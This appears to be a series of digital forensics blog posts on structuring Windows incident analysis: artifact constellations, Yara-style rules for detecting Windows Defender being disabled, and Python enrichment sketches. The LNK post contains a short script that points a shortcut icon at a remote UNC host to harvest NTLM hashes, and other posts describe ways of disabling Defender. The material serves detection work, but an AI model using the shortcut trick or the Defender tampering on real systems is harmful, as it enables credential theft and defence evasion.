Monday, April 12, 2021

On #DFIR Analysis, pt III - Benefits of a Structured Model

In my previous post, I presented some of the basic design elements for a structured approach to describing artifact constellations, and leveraging them to further DFIR analysis. As much of this is new, I'm sure that this all sounds like a lot of work, and if you've read the other posts on this topic, you're probably wondering what the benefits of all this work might be. In this post, I'll take a shot at netting out some of the more obvious ones.

Maintaining Corporate Knowledge

Regardless of whether you're talking about an internal corporate position or a consulting role, analysts are going to see and learn new things based on their analysis. You're going to see new applications or techniques used, and perhaps even see the same threat actor making small changes to their TTPs due to some "stimulus". You may find new artifacts based on the configuration of the system, or what applications are installed. A number of years ago, a co-worker was investigating a system that happened to have LANDesk installed, along with the software monitoring module. They'd found that the LANDesk module maintains a listing of executables run, including the first run time, the last run time, and the user account responsible for the last execution, all of which mapped very well into a timeline of system activity, making the resulting timeline much richer in context.

When something like this is found, how is that corporate knowledge currently maintained? In this case, the analyst wrote a RegRipper plugin that still exists and is in use today. But how are organizations (both internal and consulting teams) maintaining a record of the artifacts and constellations that analysts discover?

Maybe a better question is, are organizations doing this at all?  

For many organizations with a SOC capability, detections are written, often based on open reporting, and then tested and put into production. From there, those detections may be tuned; for internal teams, the tuning would be based on one infrastructure, but for MSS or consulting orgs, the tuning would be based on multiple (and likely an increasing number of) infrastructures. Those detections and their tuning are based on the data source (i.e., SIEM, EDR, or a combination), and serve to preserve corporate knowledge. The same approach can/should be taken with DFIR work, as well.

Consistency

One of the challenges inherent to large corporate teams, and perhaps more so to consulting teams, is that analysts all have their own way of doing things. I've mentioned previously that analysis is nothing more than an individual applying the breadth of their knowledge and experience to a data source. Very often, analysts will receive data for a case, and approach that data initially based on their own knowledge and experience. Given that each analyst has their own individual approach, the initial parsing of collected data can be a highly inefficient endeavor when viewed across the entire team. And because the approach is often based solely on the analyst's own individual experience, items of importance can be missed.

What if each analyst were instead able to approach the data sources based not just on their own knowledge and experience, but the collective experience of the team, regardless of the "state" (i.e., on vacation/PTO, left the organization, working their own case, etc.) of the other analysts? What if we were to use a parsing process that was not based on the knowledge, experience and skill of one analyst but instead on that of all analysts, as well as perhaps some developers? That process would normalize all available data sources, regardless of the knowledge and experience of an individual analyst, and the enrichment and decoration phase would also be independent of the knowledge and skill of a single analyst.

Now, something like this does not obviate the need for analysts to be able to conduct their own analysis, in their own way, but it does significantly increase efficiency, as analysts are no longer manually parsing individual data sources, particularly those selected based upon their own experience. Instead, the data sources are being parsed, and then enriched and decorated, through an automated means, one that is continually improved upon. This would also reduce costs associated with commercial licenses, as teams would not have to purchase licenses for several products for each analyst (i.e., "...I prefer this product for this work, and this other product for these other things...").
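To illustrate the idea at its simplest, a rough sketch (in Python) of that kind of team-driven enrichment step might look something like the following; the function names, record structure, and the example "known bad" check are purely hypothetical placeholders, not any particular tool:

def tag_programdata_binaries(record):
    """Example team-contributed decorator: flag something analysts have seen abused before."""
    if record.get("source") == "FILE" and "\\ProgramData\\" in record.get("desc", ""):
        record["tags"] = record.get("tags", []) + ["review: binary in ProgramData"]
    return record

def process_triage_data(parsed_records, decorators):
    """Run every normalized record through the team's shared decorators.

    parsed_records - records already normalized from the various data sources
    decorators     - functions contributed over time by any analyst on the team
    """
    for record in parsed_records:
        for decorate in decorators:      # e.g., event ID tags, known-bad paths, etc.
            record = decorate(record)
        yield record

The point isn't the code itself; it's that once a check like this is added to the shared process, every analyst benefits from it on every case, automatically.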

By approaching the initial phases of analysis in such a manner, efficiency is significantly increased, cost goes way down, and consistency goes through the roof. This can be especially true for organizations that encounter similar issues often. For example, internal organizations protecting corporate assets may regularly see certain issues across the infrastructure, such as malicious downloads or phishing with weaponized attachments. Similarly, consulting organizations may regularly see certain types of issues (i.e., ransomware, BEC, etc.) based on their business and customer base. Having an automated means for collecting, parsing, and enriching known data sources, and presenting them to the analyst saves time and money, gets the analyst to conducting analysis sooner, and provides for much more consistent and timely investigations.

Artifacts in Isolation

Deep within DFIR, behind the curtains and under the dust ruffle, when we see what really goes on, we often see analysts relying far too much on single sources of data or single artifacts for their analysis, in isolation from each other. This is very often the result of allowing analysts to "do their own thing", which while sounding like an authoritative way to conduct business, is highly inefficient and fraught with mistakes.

Not long ago, I heard a speaker at a presentation state that they'd based their determination of the "window of compromise" on a single data point, and one that had been misinterpreted. They'd stated that the ShimCache/AppCompatCache timestamp for a binary was the "time of execution", and extended the "window of compromise" in their report from a few weeks to four years, without taking time stomping into account. After the presentation was over, I had a chat with the speaker and walked through my reasoning. Unfortunately, the case they'd presented on had been completed (and adjudicated) two years prior to the presentation. For this case, a fine had been levied against the victim based on that "window of compromise".

Very often, we'll see analysts referring to a single artifact (a ShimCache entry, perhaps an entry in the AmCache.hve file, etc.) as definitive proof of execution. This is perhaps an understanding based on an over-simplification of the nature of the artifact, and without corresponding artifacts from the constellation, it will lead to inaccurate findings. It is often not until we peel back the layers of the analysis "onion" that it becomes evident that the finding, as well as the accumulated findings of the incident, were incorrectly based on individual artifacts, from data sources viewed in isolation from other pertinent data sources. Further, the nature of those artifacts is often misinterpreted; rather than demonstrating program execution, they may simply illustrate the existence of a file on the system.

Summary

Over the years that I've been doing DFIR work, little in the way of "analysis" has changed. We went from receiving a few hard drives to image and analyze, to going on-site to collect images, to doing triage collections to scope the systems that needed to be analyzed. We then extended our reach further through the use of EDR telemetry, but analysis still came down to individual analysts applying just their own knowledge and experience to collected data sources. It's time we change this model, and leverage the capabilities we have on hand in order to provide more consistent, efficient, accurate, and timely analysis.

Saturday, April 10, 2021

On #DFIR Analysis, pt II - Describing Artifact Constellations

 I've been putting some serious thought into the topic of a new #DFIR model, and in an effort to extend and expand upon my previous post a bit, I wanted to take the opportunity to document and share some of my latest thoughts.

I've discussed toolmarks and artifact constellations previously in this blog, and how they apply to attribution. In discussing a new #DFIR model, the question that arises is, how do we describe an artifact or toolmark constellation in a structured manner, so that it can be communicated and shared?  

Of course, the next step after that, once we have a structured format for describing these constellations, is automating the sharing and "machine ingestion" of these constellation descriptions. But before we get ahead of ourselves, let's discuss a possible structure a bit more. 

The New #DFIR Model

First off, to orient ourselves, figure 1 illustrates the proposed "new" #DFIR model from my previous blog post. We still have the collect, parse, and enrich/decorate phases prior to the output and data going to the analyst, but in this case, I've highlighted the "enrich/decorate" phase with a red outline, as that is where the artifact constellations would be identified.

Fig 1: New DFIR Model 
We can assume that we would start off by applying some known constellation descriptions to the parsed data during the "enrich/decorate" phase, so the process of identifying a toolmark constellation should also include some means of pulling information from the constellation, as well as "marking" or "tagging" the constellation in some manner, or facilitating some other means of notifying the analyst. From there, the expectation would be that new constellations would be defined and described through analysis, as well as through open sources, and applied to the process.

We're going to start "small" in this case, so that we can build on the structure later. What I mean by that is that we're going to start with just DFIR data; that is, data collected as either a full disk acquisition, or as part of triage response to an identified incident. We're going to start here because the data is fairly consistent across Windows systems at this point, and we can add EDR telemetry and input from a SIEM framework at a later date. So, just for the sake of this discussion, we're going to start with DFIR data.

Describing Artifact Constellations

Let's start by looking at a common artifact constellation, one for disabling Windows Defender. We know that there are a number of different ways to go about disabling Windows Defender, and that regardless of the size and composition of the artifact constellation, they all result in the same MITRE ATT&CK sub-technique. One way to go about disabling Windows Defender is through the use of Defender Control, a GUI-based tool. As this is a GUI-based tool, the threat actor would need to have shell-based access to the system, such as through a local or remote (Terminal Services/RDP) login. Beyond that point, the artifact constellation would look like:
  • UserAssist entry in the NTUSER.DAT indicating Defender Control was launched
  • Prefetch file created for Defender Control (file system/MFT; not for Windows server systems)
  • Registry values added/modified in the Software hive
  • "Microsoft-Windows-Windows Defender%4Operational.evtx" event records generated
Again, this constellation is based solely on DFIR or triage data collected from an endpoint. Notice that I point out that one artifact in the constellation (i.e., the Prefetch file) would not be available on Windows server systems. This tells us that when working with artifact constellations, we need to keep in mind that not all of the artifacts may be available, for a variety of reasons (i.e., version of Windows, system configuration, installed applications, passage of time, etc.). Other artifacts that may be available but are also heavily dependent upon the configuration of the endpoint itself include (but are not limited to) a Security-Auditing/4688 event in the Security Event Log pertaining to Defender Control, indicating the launch of the application, or possibly a Sysmon/1 event pertaining to Defender Control, again indicating the launch of the application. Again, the availability of these artifacts depends upon the specific nature and configuration of the endpoint system.

Another means to achieve the same end, albeit without requiring shell-based access, is with a batch file that modifies the specific Registry values (Defender Control modifies two Registry values) via the native LOLBIN, reg.exe. In this case, the artifact constellation would not need to be preceded (although it may be) by a Security-Auditing/4624 (login) event of either type 2 (console) or type 10 (remote). Further, there would be no expectation of a UserAssist entry (no GUI tool needs to be launched), and the Prefetch file creation/modification would be for reg.exe, rather than Defender Control. However, the remaining two artifacts in the constellation would likely remain the same.

Fig 2: WinDefend Exclusions
Of course, yet another means of "disabling Windows Defender" could be as simple as adding an exclusion to the tool, in any one or more of the five subkeys illustrated in figure 2. For example, we've seen threat actors create exclusions for any file ending in ".exe", for files found in specific paths, or for any process such as PowerShell.
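As a quick illustration of how a check like this might be automated against an acquired Software hive, here's a minimal sketch using the python-registry module; the hive path is a placeholder, and the key path shown is the commonly documented location for these exclusions, so treat both as assumptions rather than a definitive reference:

from Registry import Registry

# Software hive from a triage collection (path is a placeholder)
reg = Registry.Registry(r"F:\triage\Windows\System32\config\SOFTWARE")

try:
    exclusions = reg.open(r"Microsoft\Windows Defender\Exclusions")
except Registry.RegistryKeyNotFoundException:
    exclusions = None          # key not present in this hive

if exclusions is not None:
    for subkey in exclusions.subkeys():        # e.g., Extensions, Paths, Processes
        for value in subkey.values():
            # each exclusion is stored as the value name (e.g., ".exe")
            print("%s: %s" % (subkey.name(), value.name()))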

The point is that while there are different ways to achieve the same end, each method has its own unique toolmark constellation, and the constellations could then be used to apply attribution.  For example, the first method for disabling Windows Defender described above was observed being used by the Snatch ransomware threat actors during several attacks in May/June 2020. Something like this would not be exclusive, of course, as a toolmark constellation could be applied to more than one threat actor or group. After all, most of what we refer to as "threat actor groups" are simply how we cluster IOCs and TTPs, and a toolmark constellation is a cluster of artifacts associated with the conduct of particular activity. However, these constellations can be applied to attribution.

A Notional Description Structure

At this point, a couple of thoughts or ideas jump out at me. First, the individual artifacts within the constellation can be listed in a fashion similar to what's seen in Yara rules, with similar "strings" based upon the source. Remember, by the time we get to the "enrich/decorate" phase, we've already normalized the disparate data sources into a common structure, perhaps something similar to the five-field TLN format used in (my) timelines. The time field of the structure would allow us to identify artifacts within a specified temporal proximity, and each description field would need to be treated or handled (that is, itself parsed) differently based upon the source field. The source field from the normalized structure could be used in a similar manner as the various 'string' identifiers in Yara (i.e., 'ascii', 'nocase', 'wide', etc.), in that it would identify the specific means by which the description field should be addressed.
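For reference, normalized records in that five-field TLN format (Time|Source|System|User|Description) might look something like the following; the timestamps, host name, and descriptions are made up purely for illustration:

    1590994800|REG|WIN10-DESKTOP|jsmith|UserAssist - [Program Execution] DefenderControl.exe (1)
    1590994801|FILE|WIN10-DESKTOP|-|Prefetch - DEFENDERCONTROL.EXE-12345678.pf created
    1590994803|REG|WIN10-DESKTOP|-|Policies\Microsoft\Windows Defender - DisableAntiSpyware = 1
    1590994804|EVTX|WIN10-DESKTOP|-|Microsoft-Windows-Windows Defender/5001 - Real-time protection disabled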

Some elements of the artifact constellation may not be required, and this could easily be addressed through something similar to Yara 'conditions', in that the various artifacts could be grouped with parens, as well as 'and' and 'or', identifying those artifacts that are not required for the constellation to be effective, albeit not complete. From the above examples, the Registry values being modified would be "required", as without them, Windows Defender would not be disabled. However, a Prefetch file would not be "required", particularly when the platform being analyzed is a Windows server. A desirable side effect of adding a "scoring value" to each artifact would be that an identified constellation would then have something akin to a "confidence rating", similar to what is seen on sites such as VirusTotal (i.e., "this sample was identified as malicious by 32/69 AV engines"). For example, the following values might be applied to the bulleted artifacts that make up the illustrated constellation above:

  • Required - +1
  • Not required - +1, if present
  • +1 for each of the values, depending upon the value data
  • +1 for each event record
If all elements of the constellation are found within a defined temporal proximity, then the "confidence rating" would be 6/6. All of this could be handled automatically by the scanning engine itself.

A notional example constellation description based on something similar to Yara might then look something like the following:

strings:

    $str1 = UserAssist entry for Defender Control
    $str2 = Prefetch file for Defender Control
    $str3 = Windows Defender DisableAntiSpyware value = 1
    $str4 = Windows Defender event ID 5010 generated
    $str5 = Windows Defender DisableRealtimeMonitoring value = 1
    $str6 = Windows Defender event ID 5001 generated

condition:

    ($str1 or $str2) and ($str3 and $str4 and $str5 and $str6);

Again, temporal proximity/dispersion would need to be addressed (most likely within the scanning engine itself), either with an automatic 'value' set, or by providing a user-defined value within the rule metadata. Additionally, the order of the individual artifacts would be important, as well. You wouldn't want to run this rule and find in the output that $str1 was found 8 days after the conditions for $str3 and $str5 were met. Given that the five-field TLN format includes a time stamp as its first field, it would be pretty trivial to compute a temporal "Hamming distance", of sorts, as well as ensure proper sequencing of the artifacts or toolmarks themselves. That is to say that $str1 should appear prior to $str3, rather than after it, but not so far prior as to be unreasonable and create a false positive detection.

Finally, similar to Yara rules, the rule name would be identified in the output, along with a "confidence rating" of 6/6 for a Windows 10 system (assuming all artifacts in the cluster were available), or 5/6 for Windows Server 2019.
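Pulling these ideas together, a very rough sketch of what that scanning engine might look like in Python follows. To be clear, the record layout, rule structure, and scoring below are all notional; they simply mirror the discussion above and are not a finished specification:

from dataclasses import dataclass

@dataclass
class Record:
    """One normalized, five-field TLN-style record; time is a Unix epoch value."""
    time: int
    source: str
    system: str
    user: str
    desc: str

# Notional rule: each entry is (source, substrings to match in the description,
# required flag), listed in the expected order of occurrence.
RULE = {
    "name": "WinDefend_disabled_via_Defender_Control",
    "window": 300,   # maximum temporal dispersion, in seconds (user-defined)
    "strings": [
        ("REG",  ["UserAssist", "Defender Control"],   True),
        ("FILE", ["Prefetch", "DefenderControl"],      False),  # absent on server systems
        ("REG",  ["DisableAntiSpyware = 1"],           True),
        ("EVTX", ["Windows Defender", "5010"],         True),
        ("REG",  ["DisableRealtimeMonitoring = 1"],    True),
        ("EVTX", ["Windows Defender", "5001"],         True),
    ],
}

def apply_rule(rule, records):
    """Apply a rule to a time-sorted list of Records; return (hits, total) or None."""
    hits, times, last_time = 0, [], 0
    for source, needles, required in rule["strings"]:
        match = next((r for r in records
                      if r.source == source
                      and all(n in r.desc for n in needles)
                      and r.time >= last_time), None)
        if match is None:
            if required:
                return None          # a required artifact is missing; no detection
            continue                 # optional artifact not present; no score added
        hits += 1
        times.append(match.time)
        last_time = match.time       # enforce the sequencing of the artifacts
    if not times or max(times) - min(times) > rule["window"]:
        return None                  # artifacts too widely dispersed in time
    return hits, len(rule["strings"])

A timeline from a Windows 10 endpoint with all six artifacts present within the window would come back as (6, 6), while the same activity on a Windows Server 2019 endpoint (no Prefetch file) would come back as (5, 6), which lines up with the "confidence rating" described above.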

Counter-Forensics

Something else that we need to account for when addressing artifact constellations is counter-forensics, even that which is unintentional, such as the passage of time. Specifically, how do we deal with identifying artifact constellations when artifacts have been removed, such as application prefetching being disabled on Windows 10 (which itself may be part of a different artifact constellation), or files being deleted, or something like CCleaner being run?

Maybe a better question is, do we even need to address this circumstance? After all, the intention here is not to address every possible eventuality or circumstance, and we can create artifact constellations for various Windows functionality being disabled (or enabled).

Thursday, April 01, 2021

LNK Files, Again

I ran across SharpWebServer via Twitter recently...the first line of the readme.md file states, "A Red Team oriented simple HTTP & WebDAV server written in C# with functionality to capture Net-NTLM hashes." I thought this was fascinating because it ties directly to a technique MITRE refers to as "Forced Authentication". What this means is that a threat actor can (and has...we'll get to that shortly) modify Windows shortcut/LNK files such that the iconfilename field points to an external resource. When Explorer renders the LNK file's icon (for example, when a user browses to the folder containing it, or launches it), it will reach out to the external resource and attempt to authenticate, sending NTLM hashes across the wire. As such, SharpWebServer is built to capture those hashes.
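For illustration only, here's a minimal sketch (Python with pywin32, run on Windows) showing how trivially the icon location of a shortcut can be pointed at an external resource via the Windows Script Host shortcut object; the file names and the UNC path are placeholders, and this is not any particular threat actor's tooling:

import win32com.client

shell = win32com.client.Dispatch("WScript.Shell")
lnk = shell.CreateShortcut(r"C:\Users\Public\Desktop\Report.lnk")
lnk.TargetPath = r"C:\Windows\System32\notepad.exe"    # the shortcut still "works" as expected
lnk.IconLocation = r"\\203.0.113.10\share\icon.ico"    # external resource (placeholder address)
lnk.Save()

When Explorer resolves that icon, the endpoint attempts to authenticate to the remote share, which is exactly what a listener like SharpWebServer is waiting for.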

What this means is that a threat actor can gain access to an infrastructure, and as has been observed, use various means to maintain persistence...drop backdoors or RATs, create accounts on Internet-facing systems, etc.  However, many (albeit not all) of these means of persistence can be overcome via the judicious use of AV, EDR monitoring, and a universal password change.

Modifying the iconfilename field of an LNK file is a means of persisting beyond password changes, because even after passwords are changed, the updated hashes will be sent across the wire.

Now, I did say earlier that this has been used before, and it has.  CISA Alert TA18-074A includes a section named "Persistence through LNK file manipulation". 

Note that from the alert, when looking at the "Contents of enu.cmd", "Persistence through LNK file manipulation", and "Registry Modification" sections, we can see a pretty comprehensive set of toolmarks associated with this threat actor.  This is excellent intrusion intelligence, and should be incorporated into any and all #DFIR parsing, enrichment and decoration, as well as threat hunting.

However, things are even better! This tweet from bohops illustrates how to apply this technique to MSWord docs.

On #DFIR Analysis

I wanted to take the opportunity to discuss #DFIR analysis, and in doing so, we have to start by asking the question, "what _is_ 'analysis'?"

In most cases, what we call analysis is really just parsing some data source (or sources) and either viewing the output of the tools, or running keyword searches. When this is the entire process, it is not analysis...it's running keyword searches. Don't get me wrong, there is nothing wrong with keyword searches, as they're a great way to orient yourself to the data and provide pivot points into further analysis. However, these searches should not be considered the end of your analysis; rather, they are simply the beginning, or at least the early stages, of the analysis. The issue is that parsing data sources in isolation from each other and just running keyword searches in an attempt to conduct "analysis" is insufficient for the task, simply due to the fact that the results are missing context.

We "do analysis" when we take in data sources, perhaps apply some parsing, and then apply our knowledge and experience to those data sources.  This is pretty much how it's worked since I got started in the field over 20 yrs ago, and I'll admit, I was just following what I had seen being done before me.  Very often, this "apply our knowledge and experience" process has been abstracted through a commonly used commercial forensic analysis tool or framework (i.e., EnCase, X-Ways, FTK, Autopsy, to name a few...). 

The process of collecting data from systems has been addressed by many at this point. There are a number of both free and commercially available tools for collecting information from systems. As such, all analysts need to do at this point is keep up with changes and updates to the target operating systems and applications, and ensure the appropriate sources are included in their collections.

Over time, some have worked to make the parsing and analysis process more efficient by automating various aspects of the process, either by setting up processes via the commercial tools, or by using some external means. For example, looking way back in the mists of time when Chris "CPBeefcake" Pogue and I were working PCI engagements as part of the IBM ISS ERS team, we worked to automate (as much as possible) the various searches (hashes, file names, path names) required by Visa (at the time) so that they were done in as complete, accurate, and consistent a manner as possible. Further, tools such as plaso, RegRipper, and others provide a great deal of (albeit incomplete) parsing capability. This is not simply restricted to freely available tools; back when I was using commercial tool suites, I extended my use of ProDiscover, while I watched others simply use other commercial tools as they were "out of the box".

A great example of extending something already available in order to meet your needs can be found in this FireEye blog post, where the authors state:

We adapted the...parsing code to make it more robust and support all features necessary for parsing QMGR databases.

Overall, a broad, common issue with both collection and parsing tools is not with the tools themselves, but with how they're viewed and used. Analysts using such tools very often do little to really identify their own needs and then update or extend those tools, looking at their interaction with the tools as the end of their involvement in the process, rather than the beginning.

So, while this automates some tasks, the actual analysis is still left to the experience and knowledge of the individual analyst, and for the most part, does not extend much beyond that. This includes not only what data sources and artifacts to look to, but also the context and meaning of those (and other) data sources and artifacts. However, as Jim Mattis stated in his book, "Call Sign Chaos", "...your personal experiences alone are not broad enough to sustain you." While this statement was made specifically within the context of a warfighter, the same thing is true for DFIR analysts. So, the question becomes, how can we implement something like this in DFIR, how do we broaden the scope of our own personal experiences, and build up the knowledge and experience of all analysts, across the board, in a consistent manner?

The answer is that, much like McChrystal's "Team of Teams", we need a new model.

Fig 1: Process Schematic
A New DFIR Model

Back in the day...I love saying that, because I'm at the point in my career where I can..."DFIR" meant getting a call and going on-site to collect data, be it images, logs, triage data, etc. 

As larger, more extensive incidents were recognized and became more commonplace, there was a shift in the industry to where some DFIR consulting firms were providing EDR tools to the customer to install, the telemetry for which reported back to a SOC. Initial triage and scoping could occur either prior to an analyst arriving on-site, or the entire engagement could be run, from a technical perspective, remotely.  

Whether the engagement starts with a SOC alert, or with a customer calling for DFIR support and EDR being pushed out, at some point, data will need to be collected from a subset of systems for more extensive analysis. EDR telemetry alone does not provide all the visibility we need to respond to incidents, and as such, collecting triage data is a very valuable part of the overall process.  Data is collected, parsed, and then "analyzed". For the most part, there's been a great deal of work in this area, including here, and here. The point is that there have been more than a few variations of tools to collect triage data from live Windows systems.

Where the DFIR industry, in the general sense, falls short in this process (see fig 1) is right around the "analysis" phase. This is due to the fact that, again, "analysis" consists of each analyst applying the sum total of their own knowledge and experience to the data sources (triage data collected from systems, log data, EDR telemetry, etc.). 

Why does it "fall short"?  Well, I'll be the first to tell you, I don't know everything. I've seen a lot of ransomware and targeted ("nation state", "cybercrime") threat actors during my time, but I haven't seen all of them.  Nor have I ever done a BEC engagement. Ever. I haven't avoided them or turned them down, I've just never encountered one. This means that the analysis phase of the process is where things fall short. 

So how do we fix that? One way is to take everything I learn...new findings, lessons learned, anything I find via open sources...and "bake it back into" the overall process via a feedback loop. Now, this is something that I've done partially through several tools that I use regularly, including RegRipper, eventmap.txt, etc. This way, I don't have to rely on my fallible memory; instead, I add this new information to the automated process, so that when I parse data sources, I also "enrich" and "decorate" the appropriate fields. I'm already automating the parsing so that I don't miss something important, and now, I can increase visibility and context by automating the enrichment and decoration phase.
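As a simple sketch of that kind of enrichment (and not the actual eventmap.txt syntax), the idea boils down to a shared mapping of event source/ID pairs to tags that gets applied every time a data source is parsed; the entries and tag names below are illustrative:

# Shared event source/ID to tag mapping; entries are illustrative examples.
EVENT_TAGS = {
    ("Microsoft-Windows-Security-Auditing", 4624): "[Login]",
    ("Microsoft-Windows-Security-Auditing", 4688): "[Program Execution]",
    ("Microsoft-Windows-Windows Defender", 5001):  "[Defender real-time protection disabled]",
}

def decorate(source_name, event_id, description):
    """Prepend the shared tag, if one exists, to a parsed event description."""
    tag = EVENT_TAGS.get((source_name, event_id))
    return "%s %s" % (tag, description) if tag else description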

Now, imagine how powerful this would be if we took several steps.  First, we make this available to all analysts on the team. What one analyst learns instantly becomes available to all analysts, as the experience and knowledge of one is shared with many. Steve learns something new, and it's immediately available to David, Emily, Margo, and all of the other analysts. You do not have to wait until Steve works directly with Emily on an engagement, and you do not have to hope that the subject comes up. The great thing is that if you make this part of the DFIR culture, it works even if Steve goes on paternity leave or a family vacation, and it persists beyond any one analyst leaving the organization entirely.

Second, we further extend our enrichment and decoration capability by incorporating threat intelligence. If we do so initially using open reporting, we can greatly extend that open reporting by providing actual intrusion intelligence. We can use open reporting to take what others see on engagements that we have yet to experience, and use that to extend our own experience. Further, the threat intelligence produced (if that's something you're doing) now incorporates actual intrusion intel, which is tied directly to on-system artifacts. For example, while open reporting may state that a particular threat actor group "disables Windows Defender", intrusion intel from those incidents will tell us how they do so, and when during the attack cycle they take these actions. This can provide insight into better tooling and visibility, earlier detection of threat actors, and a much more granular picture of what occurred on the system.

Third, because this is all tied to the SOC, we can further extend our capabilities by baking new DFIR findings back into the SOC in the form of detections. This feedback loop leads to higher fidelity detections that provide greater context to the SOC alerts themselves. A great example of this feedback process can be seen here; while this blog post just passed its 5th birthday, all that means is that the process worked then and is still equally, if not more, valid today. The use of WMI persistence led directly to the creation of new high-fidelity SOC EDR detections, which provided significantly greater efficacy and context.

While everyone else is talking about 'big data', or the 'lack of cybersecurity skills', there is a simple approach to addressing those issues, and more...all we need to do is change the business model used to drive DFIR, and change the DFIR culture.